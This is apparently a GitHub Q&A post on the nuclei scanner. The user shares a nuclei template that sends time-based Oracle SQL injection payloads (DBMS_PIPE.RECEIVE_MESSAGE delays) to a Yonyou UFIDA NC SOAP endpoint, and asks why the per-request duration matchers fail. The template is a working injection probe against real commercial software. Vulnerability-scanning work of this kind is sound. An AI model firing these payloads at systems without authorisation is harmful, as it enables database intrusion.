### DISCUSSION TITLE
when use payload ,status_code_1   _2 _3 seems  is not work

### DISCUSSION THREAD

**Discussion by anquanscan** [projectdiscovery/nuclei#4691] [Q&A] [answered]
```yaml
id: yonyou-ufida-nc-Interface-sqli

info:
  name: yonyou-ufida-nc-Interface-sqli
  author: yonyou-ufida-nc-Interface-sqli
  severity: high

http:
  - raw:
      - |
        POST /uapws/service/nc.itf.bd.crm.Interface HTTP/1.1
        User-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
        SOAPAction: urn:exportCustomerToCrm
        Content-type: text/xml;charset=UTF-8
        Host: {{Hostname}}
        Connection: close

        <soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:icus="http://crm.bd.itf.nc/Interface">
          <soapenv:Header/>
          <soapenv:Body>
              <icus:Interface>
                <!--type: string-->
                <string>
                  {{oracle}}
                </string>
              </icus:Interface>
          </soapenv:Body>
        </soapenv:Envelope>



    payloads:
      oracle:
        - test') AND 2869=DBMS_PIPE.RECEIVE_MESSAGE(CHR(90)||CHR(73)||CHR(70)||CHR(87),0)-- tVQa
        - test') AND 2869=DBMS_PIPE.RECEIVE_MESSAGE(CHR(90)||CHR(73)||CHR(70)||CHR(87),2)-- tVQa
        - test') AND 2869=DBMS_PIPE.RECEIVE_MESSAGE(CHR(90)||CHR(73)||CHR(70)||CHR(87),4)-- tVQa


    req-condition: true
    matchers:
      - type: dsl
        condition: and
        dsl:
          - "duration_1>=0  && duration_1<=2"
          - "duration_2>=2  && duration_2<=4"
          - "duration_3>=4  && duration_3<=6"
          - print_debug(duration_1)
```

I  do not want to write to many  POST request， I want  my code concise 。 but  it seems not work。
